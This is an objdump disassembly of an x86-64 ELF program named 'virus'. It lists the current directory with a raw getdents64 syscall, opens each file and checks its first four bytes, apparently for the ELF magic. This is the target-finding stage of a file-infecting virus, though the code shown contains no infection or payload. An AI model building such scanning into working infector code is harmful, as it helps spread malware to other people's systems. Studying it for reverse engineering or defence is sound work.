
virus:     file format elf64-x86-64


Disassembly of section .init:

0000000000000728 <.init>:
 728:	48 83 ec 08          	sub    rsp,0x8
 72c:	48 8b 05 b5 18 20 00 	mov    rax,QWORD PTR [rip+0x2018b5]        # 201fe8 <__cxa_finalize@plt+0x2017f8>
 733:	48 85 c0             	test   rax,rax
 736:	74 02                	je     73a <strlen@plt-0x16>
 738:	ff d0                	call   rax
 73a:	48 83 c4 08          	add    rsp,0x8
 73e:	c3                   	ret    

Disassembly of section .plt:

0000000000000740 <strlen@plt-0x10>:
 740:	ff 35 32 18 20 00    	push   QWORD PTR [rip+0x201832]        # 201f78 <__cxa_finalize@plt+0x201788>
 746:	ff 25 34 18 20 00    	jmp    QWORD PTR [rip+0x201834]        # 201f80 <__cxa_finalize@plt+0x201790>
 74c:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]

0000000000000750 <strlen@plt>:
 750:	ff 25 32 18 20 00    	jmp    QWORD PTR [rip+0x201832]        # 201f88 <__cxa_finalize@plt+0x201798>
 756:	68 00 00 00 00       	push   0x0
 75b:	e9 e0 ff ff ff       	jmp    740 <strlen@plt-0x10>

0000000000000760 <__stack_chk_fail@plt>:
 760:	ff 25 2a 18 20 00    	jmp    QWORD PTR [rip+0x20182a]        # 201f90 <__cxa_finalize@plt+0x2017a0>
 766:	68 01 00 00 00       	push   0x1
 76b:	e9 d0 ff ff ff       	jmp    740 <strlen@plt-0x10>

0000000000000770 <mmap@plt>:
 770:	ff 25 22 18 20 00    	jmp    QWORD PTR [rip+0x201822]        # 201f98 <__cxa_finalize@plt+0x2017a8>
 776:	68 02 00 00 00       	push   0x2
 77b:	e9 c0 ff ff ff       	jmp    740 <strlen@plt-0x10>

0000000000000780 <memset@plt>:
 780:	ff 25 1a 18 20 00    	jmp    QWORD PTR [rip+0x20181a]        # 201fa0 <__cxa_finalize@plt+0x2017b0>
 786:	68 03 00 00 00       	push   0x3
 78b:	e9 b0 ff ff ff       	jmp    740 <strlen@plt-0x10>

0000000000000790 <close@plt>:
 790:	ff 25 12 18 20 00    	jmp    QWORD PTR [rip+0x201812]        # 201fa8 <__cxa_finalize@plt+0x2017b8>
 796:	68 04 00 00 00       	push   0x4
 79b:	e9 a0 ff ff ff       	jmp    740 <strlen@plt-0x10>

00000000000007a0 <read@plt>:
 7a0:	ff 25 0a 18 20 00    	jmp    QWORD PTR [rip+0x20180a]        # 201fb0 <__cxa_finalize@plt+0x2017c0>
 7a6:	68 05 00 00 00       	push   0x5
 7ab:	e9 90 ff ff ff       	jmp    740 <strlen@plt-0x10>

00000000000007b0 <memcmp@plt>:
 7b0:	ff 25 02 18 20 00    	jmp    QWORD PTR [rip+0x201802]        # 201fb8 <__cxa_finalize@plt+0x2017c8>
 7b6:	68 06 00 00 00       	push   0x6
 7bb:	e9 80 ff ff ff       	jmp    740 <strlen@plt-0x10>

00000000000007c0 <strcmp@plt>:
 7c0:	ff 25 fa 17 20 00    	jmp    QWORD PTR [rip+0x2017fa]        # 201fc0 <__cxa_finalize@plt+0x2017d0>
 7c6:	68 07 00 00 00       	push   0x7
 7cb:	e9 70 ff ff ff       	jmp    740 <strlen@plt-0x10>

00000000000007d0 <memcpy@plt>:
 7d0:	ff 25 f2 17 20 00    	jmp    QWORD PTR [rip+0x2017f2]        # 201fc8 <__cxa_finalize@plt+0x2017d8>
 7d6:	68 08 00 00 00       	push   0x8
 7db:	e9 60 ff ff ff       	jmp    740 <strlen@plt-0x10>

00000000000007e0 <open@plt>:
 7e0:	ff 25 ea 17 20 00    	jmp    QWORD PTR [rip+0x2017ea]        # 201fd0 <__cxa_finalize@plt+0x2017e0>
 7e6:	68 09 00 00 00       	push   0x9
 7eb:	e9 50 ff ff ff       	jmp    740 <strlen@plt-0x10>

Disassembly of section .plt.got:

00000000000007f0 <__cxa_finalize@plt>:
 7f0:	ff 25 02 18 20 00    	jmp    QWORD PTR [rip+0x201802]        # 201ff8 <__cxa_finalize@plt+0x201808>
 7f6:	66 90                	xchg   ax,ax

Disassembly of section .text:

0000000000000800 <.text>:
 800:	31 ed                	xor    ebp,ebp
 802:	49 89 d1             	mov    r9,rdx
 805:	5e                   	pop    rsi
 806:	48 89 e2             	mov    rdx,rsp
 809:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
 80d:	50                   	push   rax
 80e:	54                   	push   rsp
 80f:	4c 8d 05 9a 05 00 00 	lea    r8,[rip+0x59a]        # db0 <__cxa_finalize@plt+0x5c0>
 816:	48 8d 0d 23 05 00 00 	lea    rcx,[rip+0x523]        # d40 <__cxa_finalize@plt+0x550>
 81d:	48 8d 3d 7d 03 00 00 	lea    rdi,[rip+0x37d]        # ba1 <__cxa_finalize@plt+0x3b1>
 824:	ff 15 b6 17 20 00    	call   QWORD PTR [rip+0x2017b6]        # 201fe0 <__cxa_finalize@plt+0x2017f0>
 82a:	f4                   	hlt    
 82b:	0f 1f 44 00 00       	nop    DWORD PTR [rax+rax*1+0x0]
 830:	48 8d 3d d9 17 20 00 	lea    rdi,[rip+0x2017d9]        # 202010 <__cxa_finalize@plt+0x201820>
 837:	55                   	push   rbp
 838:	48 8d 05 d1 17 20 00 	lea    rax,[rip+0x2017d1]        # 202010 <__cxa_finalize@plt+0x201820>
 83f:	48 39 f8             	cmp    rax,rdi
 842:	48 89 e5             	mov    rbp,rsp
 845:	74 19                	je     860 <__cxa_finalize@plt+0x70>
 847:	48 8b 05 8a 17 20 00 	mov    rax,QWORD PTR [rip+0x20178a]        # 201fd8 <__cxa_finalize@plt+0x2017e8>
 84e:	48 85 c0             	test   rax,rax
 851:	74 0d                	je     860 <__cxa_finalize@plt+0x70>
 853:	5d                   	pop    rbp
 854:	ff e0                	jmp    rax
 856:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
 85d:	00 00 00 
 860:	5d                   	pop    rbp
 861:	c3                   	ret    
 862:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]
 866:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
 86d:	00 00 00 
 870:	48 8d 3d 99 17 20 00 	lea    rdi,[rip+0x201799]        # 202010 <__cxa_finalize@plt+0x201820>
 877:	48 8d 35 92 17 20 00 	lea    rsi,[rip+0x201792]        # 202010 <__cxa_finalize@plt+0x201820>
 87e:	55                   	push   rbp
 87f:	48 29 fe             	sub    rsi,rdi
 882:	48 89 e5             	mov    rbp,rsp
 885:	48 c1 fe 03          	sar    rsi,0x3
 889:	48 89 f0             	mov    rax,rsi
 88c:	48 c1 e8 3f          	shr    rax,0x3f
 890:	48 01 c6             	add    rsi,rax
 893:	48 d1 fe             	sar    rsi,1
 896:	74 18                	je     8b0 <__cxa_finalize@plt+0xc0>
 898:	48 8b 05 51 17 20 00 	mov    rax,QWORD PTR [rip+0x201751]        # 201ff0 <__cxa_finalize@plt+0x201800>
 89f:	48 85 c0             	test   rax,rax
 8a2:	74 0c                	je     8b0 <__cxa_finalize@plt+0xc0>
 8a4:	5d                   	pop    rbp
 8a5:	ff e0                	jmp    rax
 8a7:	66 0f 1f 84 00 00 00 	nop    WORD PTR [rax+rax*1+0x0]
 8ae:	00 00 
 8b0:	5d                   	pop    rbp
 8b1:	c3                   	ret    
 8b2:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]
 8b6:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
 8bd:	00 00 00 
 8c0:	80 3d 49 17 20 00 00 	cmp    BYTE PTR [rip+0x201749],0x0        # 202010 <__cxa_finalize@plt+0x201820>
 8c7:	75 2f                	jne    8f8 <__cxa_finalize@plt+0x108>
 8c9:	48 83 3d 27 17 20 00 	cmp    QWORD PTR [rip+0x201727],0x0        # 201ff8 <__cxa_finalize@plt+0x201808>
 8d0:	00 
 8d1:	55                   	push   rbp
 8d2:	48 89 e5             	mov    rbp,rsp
 8d5:	74 0c                	je     8e3 <__cxa_finalize@plt+0xf3>
 8d7:	48 8b 3d 2a 17 20 00 	mov    rdi,QWORD PTR [rip+0x20172a]        # 202008 <__cxa_finalize@plt+0x201818>
 8de:	e8 0d ff ff ff       	call   7f0 <__cxa_finalize@plt>
 8e3:	e8 48 ff ff ff       	call   830 <__cxa_finalize@plt+0x40>
 8e8:	c6 05 21 17 20 00 01 	mov    BYTE PTR [rip+0x201721],0x1        # 202010 <__cxa_finalize@plt+0x201820>
 8ef:	5d                   	pop    rbp
 8f0:	c3                   	ret    
 8f1:	0f 1f 80 00 00 00 00 	nop    DWORD PTR [rax+0x0]
 8f8:	f3 c3                	repz ret 
 8fa:	66 0f 1f 44 00 00    	nop    WORD PTR [rax+rax*1+0x0]
 900:	55                   	push   rbp
 901:	48 89 e5             	mov    rbp,rsp
 904:	5d                   	pop    rbp
 905:	e9 66 ff ff ff       	jmp    870 <__cxa_finalize@plt+0x80>
 90a:	55                   	push   rbp
 90b:	48 89 e5             	mov    rbp,rsp
 90e:	89 7d ec             	mov    DWORD PTR [rbp-0x14],edi
 911:	48 89 75 e0          	mov    QWORD PTR [rbp-0x20],rsi
 915:	89 55 e8             	mov    DWORD PTR [rbp-0x18],edx
 918:	48 8b 7d ec          	mov    rdi,QWORD PTR [rbp-0x14]
 91c:	48 8b 75 e0          	mov    rsi,QWORD PTR [rbp-0x20]
 920:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
 924:	48 c7 c0 d9 00 00 00 	mov    rax,0xd9
 92b:	0f 05                	syscall 
 92d:	48 89 c0             	mov    rax,rax
 930:	48 89 45 f8          	mov    QWORD PTR [rbp-0x8],rax
 934:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
 938:	5d                   	pop    rbp
 939:	c3                   	ret    
 93a:	55                   	push   rbp
 93b:	48 89 e5             	mov    rbp,rsp
 93e:	48 83 ec 10          	sub    rsp,0x10
 942:	48 89 7d f8          	mov    QWORD PTR [rbp-0x8],rdi
 946:	48 89 75 f0          	mov    QWORD PTR [rbp-0x10],rsi
 94a:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
 94e:	48 8b 00             	mov    rax,QWORD PTR [rax]
 951:	48 85 c0             	test   rax,rax
 954:	75 3c                	jne    992 <__cxa_finalize@plt+0x1a2>
 956:	41 b9 00 00 00 00    	mov    r9d,0x0
 95c:	41 b8 ff ff ff ff    	mov    r8d,0xffffffff
 962:	b9 22 00 00 00       	mov    ecx,0x22
 967:	ba 03 00 00 00       	mov    edx,0x3
 96c:	be 00 00 20 00       	mov    esi,0x200000
 971:	bf 00 00 00 00       	mov    edi,0x0
 976:	e8 f5 fd ff ff       	call   770 <mmap@plt>
 97b:	48 89 c2             	mov    rdx,rax
 97e:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
 982:	48 89 10             	mov    QWORD PTR [rax],rdx
 985:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
 989:	48 8b 00             	mov    rax,QWORD PTR [rax]
 98c:	48 83 f8 ff          	cmp    rax,0xffffffffffffffff
 990:	74 28                	je     9ba <__cxa_finalize@plt+0x1ca>
 992:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
 996:	48 8b 00             	mov    rax,QWORD PTR [rax]
 999:	48 8d 90 00 01 00 00 	lea    rdx,[rax+0x100]
 9a0:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
 9a4:	48 89 10             	mov    QWORD PTR [rax],rdx
 9a7:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
 9ab:	48 8b 00             	mov    rax,QWORD PTR [rax]
 9ae:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
 9b2:	48 f7 da             	neg    rdx
 9b5:	48 01 d0             	add    rax,rdx
 9b8:	eb 02                	jmp    9bc <__cxa_finalize@plt+0x1cc>
 9ba:	90                   	nop
 9bb:	90                   	nop
 9bc:	c9                   	leave  
 9bd:	c3                   	ret    
 9be:	55                   	push   rbp
 9bf:	48 89 e5             	mov    rbp,rsp
 9c2:	53                   	push   rbx
 9c3:	48 83 ec 38          	sub    rsp,0x38
 9c7:	48 89 7d d8          	mov    QWORD PTR [rbp-0x28],rdi
 9cb:	48 89 75 d0          	mov    QWORD PTR [rbp-0x30],rsi
 9cf:	48 89 55 c8          	mov    QWORD PTR [rbp-0x38],rdx
 9d3:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
 9d7:	48 89 c7             	mov    rdi,rax
 9da:	e8 71 fd ff ff       	call   750 <strlen@plt>
 9df:	48 89 c3             	mov    rbx,rax
 9e2:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
 9e6:	48 89 c7             	mov    rdi,rax
 9e9:	e8 62 fd ff ff       	call   750 <strlen@plt>
 9ee:	48 01 d8             	add    rax,rbx
 9f1:	48 8d 50 02          	lea    rdx,[rax+0x2]
 9f5:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
 9f9:	48 89 c6             	mov    rsi,rax
 9fc:	48 89 d7             	mov    rdi,rdx
 9ff:	e8 36 ff ff ff       	call   93a <__cxa_finalize@plt+0x14a>
 a04:	48 89 45 e8          	mov    QWORD PTR [rbp-0x18],rax
 a08:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
 a0c:	48 89 c7             	mov    rdi,rax
 a0f:	e8 3c fd ff ff       	call   750 <strlen@plt>
 a14:	48 89 c3             	mov    rbx,rax
 a17:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
 a1b:	48 89 c7             	mov    rdi,rax
 a1e:	e8 2d fd ff ff       	call   750 <strlen@plt>
 a23:	48 8d 14 03          	lea    rdx,[rbx+rax*1]
 a27:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
 a2b:	be 00 00 00 00       	mov    esi,0x0
 a30:	48 89 c7             	mov    rdi,rax
 a33:	e8 48 fd ff ff       	call   780 <memset@plt>
 a38:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
 a3c:	48 89 c7             	mov    rdi,rax
 a3f:	e8 0c fd ff ff       	call   750 <strlen@plt>
 a44:	48 89 c2             	mov    rdx,rax
 a47:	48 8b 4d d0          	mov    rcx,QWORD PTR [rbp-0x30]
 a4b:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
 a4f:	48 89 ce             	mov    rsi,rcx
 a52:	48 89 c7             	mov    rdi,rax
 a55:	e8 76 fd ff ff       	call   7d0 <memcpy@plt>
 a5a:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
 a5e:	48 89 c7             	mov    rdi,rax
 a61:	e8 ea fc ff ff       	call   750 <strlen@plt>
 a66:	48 89 c2             	mov    rdx,rax
 a69:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
 a6d:	48 01 d0             	add    rax,rdx
 a70:	c6 00 2f             	mov    BYTE PTR [rax],0x2f
 a73:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
 a77:	0f b6 00             	movzx  eax,BYTE PTR [rax]
 a7a:	3c 2e                	cmp    al,0x2e
 a7c:	75 14                	jne    a92 <__cxa_finalize@plt+0x2a2>
 a7e:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
 a82:	48 83 c0 01          	add    rax,0x1
 a86:	0f b6 00             	movzx  eax,BYTE PTR [rax]
 a89:	3c 2f                	cmp    al,0x2f
 a8b:	75 05                	jne    a92 <__cxa_finalize@plt+0x2a2>
 a8d:	48 83 45 d8 02       	add    QWORD PTR [rbp-0x28],0x2
 a92:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
 a96:	48 89 c7             	mov    rdi,rax
 a99:	e8 b2 fc ff ff       	call   750 <strlen@plt>
 a9e:	48 89 c3             	mov    rbx,rax
 aa1:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
 aa5:	48 89 c7             	mov    rdi,rax
 aa8:	e8 a3 fc ff ff       	call   750 <strlen@plt>
 aad:	48 8d 50 01          	lea    rdx,[rax+0x1]
 ab1:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
 ab5:	48 8d 0c 02          	lea    rcx,[rdx+rax*1]
 ab9:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
 abd:	48 89 da             	mov    rdx,rbx
 ac0:	48 89 c6             	mov    rsi,rax
 ac3:	48 89 cf             	mov    rdi,rcx
 ac6:	e8 05 fd ff ff       	call   7d0 <memcpy@plt>
 acb:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
 acf:	48 83 c4 38          	add    rsp,0x38
 ad3:	5b                   	pop    rbx
 ad4:	5d                   	pop    rbp
 ad5:	c3                   	ret    
 ad6:	55                   	push   rbp
 ad7:	48 89 e5             	mov    rbp,rsp
 ada:	48 81 ec 30 10 00 00 	sub    rsp,0x1030
 ae1:	48 89 bd d8 ef ff ff 	mov    QWORD PTR [rbp-0x1028],rdi
 ae8:	64 48 8b 04 25 28 00 	mov    rax,QWORD PTR fs:0x28
 aef:	00 00 
 af1:	48 89 45 f8          	mov    QWORD PTR [rbp-0x8],rax
 af5:	31 c0                	xor    eax,eax
 af7:	48 8b 85 d8 ef ff ff 	mov    rax,QWORD PTR [rbp-0x1028]
 afe:	ba 00 00 00 00       	mov    edx,0x0
 b03:	be 00 00 00 00       	mov    esi,0x0
 b08:	48 89 c7             	mov    rdi,rax
 b0b:	b8 00 00 00 00       	mov    eax,0x0
 b10:	e8 cb fc ff ff       	call   7e0 <open@plt>
 b15:	89 85 ec ef ff ff    	mov    DWORD PTR [rbp-0x1014],eax
 b1b:	83 bd ec ef ff ff 00 	cmp    DWORD PTR [rbp-0x1014],0x0
 b22:	79 07                	jns    b2b <__cxa_finalize@plt+0x33b>
 b24:	b8 ff ff ff ff       	mov    eax,0xffffffff
 b29:	eb 60                	jmp    b8b <__cxa_finalize@plt+0x39b>
 b2b:	48 8d 8d f0 ef ff ff 	lea    rcx,[rbp-0x1010]
 b32:	8b 85 ec ef ff ff    	mov    eax,DWORD PTR [rbp-0x1014]
 b38:	ba 00 10 00 00       	mov    edx,0x1000
 b3d:	48 89 ce             	mov    rsi,rcx
 b40:	89 c7                	mov    edi,eax
 b42:	e8 59 fc ff ff       	call   7a0 <read@plt>
 b47:	48 85 c0             	test   rax,rax
 b4a:	79 07                	jns    b53 <__cxa_finalize@plt+0x363>
 b4c:	b8 ff ff ff ff       	mov    eax,0xffffffff
 b51:	eb 38                	jmp    b8b <__cxa_finalize@plt+0x39b>
 b53:	8b 85 ec ef ff ff    	mov    eax,DWORD PTR [rbp-0x1014]
 b59:	89 c7                	mov    edi,eax
 b5b:	e8 30 fc ff ff       	call   790 <close@plt>
 b60:	48 8d 85 f0 ef ff ff 	lea    rax,[rbp-0x1010]
 b67:	ba 04 00 00 00       	mov    edx,0x4
 b6c:	48 89 c6             	mov    rsi,rax
 b6f:	48 8d 3d 4e 02 00 00 	lea    rdi,[rip+0x24e]        # dc4 <__cxa_finalize@plt+0x5d4>
 b76:	e8 35 fc ff ff       	call   7b0 <memcmp@plt>
 b7b:	85 c0                	test   eax,eax
 b7d:	74 07                	je     b86 <__cxa_finalize@plt+0x396>
 b7f:	b8 ff ff ff ff       	mov    eax,0xffffffff
 b84:	eb 05                	jmp    b8b <__cxa_finalize@plt+0x39b>
 b86:	b8 00 00 00 00       	mov    eax,0x0
 b8b:	48 8b 4d f8          	mov    rcx,QWORD PTR [rbp-0x8]
 b8f:	64 48 33 0c 25 28 00 	xor    rcx,QWORD PTR fs:0x28
 b96:	00 00 
 b98:	74 05                	je     b9f <__cxa_finalize@plt+0x3af>
 b9a:	e8 c1 fb ff ff       	call   760 <__stack_chk_fail@plt>
 b9f:	c9                   	leave  
 ba0:	c3                   	ret    
 ba1:	55                   	push   rbp
 ba2:	48 89 e5             	mov    rbp,rsp
 ba5:	48 81 ec 50 80 00 00 	sub    rsp,0x8050
 bac:	64 48 8b 04 25 28 00 	mov    rax,QWORD PTR fs:0x28
 bb3:	00 00 
 bb5:	48 89 45 f8          	mov    QWORD PTR [rbp-0x8],rax
 bb9:	31 c0                	xor    eax,eax
 bbb:	48 c7 85 d0 7f ff ff 	mov    QWORD PTR [rbp-0x8030],0x0
 bc2:	00 00 00 00 
 bc6:	48 c7 85 c8 7f ff ff 	mov    QWORD PTR [rbp-0x8038],0x0
 bcd:	00 00 00 00 
 bd1:	c6 85 ee 7f ff ff 2e 	mov    BYTE PTR [rbp-0x8012],0x2e
 bd8:	c6 85 ef 7f ff ff 00 	mov    BYTE PTR [rbp-0x8011],0x0
 bdf:	48 8d 85 ee 7f ff ff 	lea    rax,[rbp-0x8012]
 be6:	48 89 85 d0 7f ff ff 	mov    QWORD PTR [rbp-0x8030],rax
 bed:	48 8b 85 d0 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8030]
 bf4:	ba 00 00 00 00       	mov    edx,0x0
 bf9:	be 00 00 01 00       	mov    esi,0x10000
 bfe:	48 89 c7             	mov    rdi,rax
 c01:	b8 00 00 00 00       	mov    eax,0x0
 c06:	e8 d5 fb ff ff       	call   7e0 <open@plt>
 c0b:	89 85 bc 7f ff ff    	mov    DWORD PTR [rbp-0x8044],eax
 c11:	8b 85 bc 7f ff ff    	mov    eax,DWORD PTR [rbp-0x8044]
 c17:	48 8d 8d f0 7f ff ff 	lea    rcx,[rbp-0x8010]
 c1e:	ba 00 80 00 00       	mov    edx,0x8000
 c23:	48 89 ce             	mov    rsi,rcx
 c26:	89 c7                	mov    edi,eax
 c28:	e8 dd fc ff ff       	call   90a <__cxa_finalize@plt+0x11a>
 c2d:	89 85 c0 7f ff ff    	mov    DWORD PTR [rbp-0x8040],eax
 c33:	83 bd c0 7f ff ff 00 	cmp    DWORD PTR [rbp-0x8040],0x0
 c3a:	0f 88 e5 00 00 00    	js     d25 <__cxa_finalize@plt+0x535>
 c40:	83 bd c0 7f ff ff 00 	cmp    DWORD PTR [rbp-0x8040],0x0
 c47:	0f 84 db 00 00 00    	je     d28 <__cxa_finalize@plt+0x538>
 c4d:	c7 85 c4 7f ff ff 00 	mov    DWORD PTR [rbp-0x803c],0x0
 c54:	00 00 00 
 c57:	c7 85 b8 7f ff ff 00 	mov    DWORD PTR [rbp-0x8048],0x0
 c5e:	00 00 00 
 c61:	e9 a6 00 00 00       	jmp    d0c <__cxa_finalize@plt+0x51c>
 c66:	8b 85 b8 7f ff ff    	mov    eax,DWORD PTR [rbp-0x8048]
 c6c:	48 98                	cdqe   
 c6e:	48 8d 95 f0 7f ff ff 	lea    rdx,[rbp-0x8010]
 c75:	48 01 d0             	add    rax,rdx
 c78:	48 89 85 d8 7f ff ff 	mov    QWORD PTR [rbp-0x8028],rax
 c7f:	48 8b 85 d8 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8028]
 c86:	0f b7 40 10          	movzx  eax,WORD PTR [rax+0x10]
 c8a:	0f b7 c0             	movzx  eax,ax
 c8d:	83 e8 01             	sub    eax,0x1
 c90:	01 85 b8 7f ff ff    	add    DWORD PTR [rbp-0x8048],eax
 c96:	48 8b 85 d8 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8028]
 c9d:	48 83 c0 13          	add    rax,0x13
 ca1:	48 8d 35 21 01 00 00 	lea    rsi,[rip+0x121]        # dc9 <__cxa_finalize@plt+0x5d9>
 ca8:	48 89 c7             	mov    rdi,rax
 cab:	e8 10 fb ff ff       	call   7c0 <strcmp@plt>
 cb0:	85 c0                	test   eax,eax
 cb2:	74 4d                	je     d01 <__cxa_finalize@plt+0x511>
 cb4:	48 8b 85 d8 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8028]
 cbb:	0f b6 40 13          	movzx  eax,BYTE PTR [rax+0x13]
 cbf:	3c 2e                	cmp    al,0x2e
 cc1:	74 41                	je     d04 <__cxa_finalize@plt+0x514>
 cc3:	48 8b 85 d8 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8028]
 cca:	48 8d 48 13          	lea    rcx,[rax+0x13]
 cce:	48 8d 95 c8 7f ff ff 	lea    rdx,[rbp-0x8038]
 cd5:	48 8b 85 d0 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8030]
 cdc:	48 89 c6             	mov    rsi,rax
 cdf:	48 89 cf             	mov    rdi,rcx
 ce2:	e8 d7 fc ff ff       	call   9be <__cxa_finalize@plt+0x1ce>
 ce7:	48 89 85 e0 7f ff ff 	mov    QWORD PTR [rbp-0x8020],rax
 cee:	48 8b 85 e0 7f ff ff 	mov    rax,QWORD PTR [rbp-0x8020]
 cf5:	48 89 c7             	mov    rdi,rax
 cf8:	e8 d9 fd ff ff       	call   ad6 <__cxa_finalize@plt+0x2e6>
 cfd:	85 c0                	test   eax,eax
 cff:	eb 04                	jmp    d05 <__cxa_finalize@plt+0x515>
 d01:	90                   	nop
 d02:	eb 01                	jmp    d05 <__cxa_finalize@plt+0x515>
 d04:	90                   	nop
 d05:	83 85 b8 7f ff ff 01 	add    DWORD PTR [rbp-0x8048],0x1
 d0c:	8b 85 b8 7f ff ff    	mov    eax,DWORD PTR [rbp-0x8048]
 d12:	3b 85 c0 7f ff ff    	cmp    eax,DWORD PTR [rbp-0x8040]
 d18:	0f 8c 48 ff ff ff    	jl     c66 <__cxa_finalize@plt+0x476>
 d1e:	b8 00 00 00 00       	mov    eax,0x0
 d23:	eb 04                	jmp    d29 <__cxa_finalize@plt+0x539>
 d25:	90                   	nop
 d26:	eb 01                	jmp    d29 <__cxa_finalize@plt+0x539>
 d28:	90                   	nop
 d29:	48 8b 4d f8          	mov    rcx,QWORD PTR [rbp-0x8]
 d2d:	64 48 33 0c 25 28 00 	xor    rcx,QWORD PTR fs:0x28
 d34:	00 00 
 d36:	74 05                	je     d3d <__cxa_finalize@plt+0x54d>
 d38:	e8 23 fa ff ff       	call   760 <__stack_chk_fail@plt>
 d3d:	c9                   	leave  
 d3e:	c3                   	ret    
 d3f:	90                   	nop
 d40:	41 57                	push   r15
 d42:	41 56                	push   r14
 d44:	49 89 d7             	mov    r15,rdx
 d47:	41 55                	push   r13
 d49:	41 54                	push   r12
 d4b:	4c 8d 25 1e 10 20 00 	lea    r12,[rip+0x20101e]        # 201d70 <__cxa_finalize@plt+0x201580>
 d52:	55                   	push   rbp
 d53:	48 8d 2d 1e 10 20 00 	lea    rbp,[rip+0x20101e]        # 201d78 <__cxa_finalize@plt+0x201588>
 d5a:	53                   	push   rbx
 d5b:	41 89 fd             	mov    r13d,edi
 d5e:	49 89 f6             	mov    r14,rsi
 d61:	4c 29 e5             	sub    rbp,r12
 d64:	48 83 ec 08          	sub    rsp,0x8
 d68:	48 c1 fd 03          	sar    rbp,0x3
 d6c:	e8 b7 f9 ff ff       	call   728 <strlen@plt-0x28>
 d71:	48 85 ed             	test   rbp,rbp
 d74:	74 20                	je     d96 <__cxa_finalize@plt+0x5a6>
 d76:	31 db                	xor    ebx,ebx
 d78:	0f 1f 84 00 00 00 00 	nop    DWORD PTR [rax+rax*1+0x0]
 d7f:	00 
 d80:	4c 89 fa             	mov    rdx,r15
 d83:	4c 89 f6             	mov    rsi,r14
 d86:	44 89 ef             	mov    edi,r13d
 d89:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]
 d8d:	48 83 c3 01          	add    rbx,0x1
 d91:	48 39 dd             	cmp    rbp,rbx
 d94:	75 ea                	jne    d80 <__cxa_finalize@plt+0x590>
 d96:	48 83 c4 08          	add    rsp,0x8
 d9a:	5b                   	pop    rbx
 d9b:	5d                   	pop    rbp
 d9c:	41 5c                	pop    r12
 d9e:	41 5d                	pop    r13
 da0:	41 5e                	pop    r14
 da2:	41 5f                	pop    r15
 da4:	c3                   	ret    
 da5:	90                   	nop
 da6:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
 dad:	00 00 00 
 db0:	f3 c3                	repz ret 

Disassembly of section .fini:

0000000000000db4 <.fini>:
 db4:	48 83 ec 08          	sub    rsp,0x8
 db8:	48 83 c4 08          	add    rsp,0x8
 dbc:	c3                   	ret    
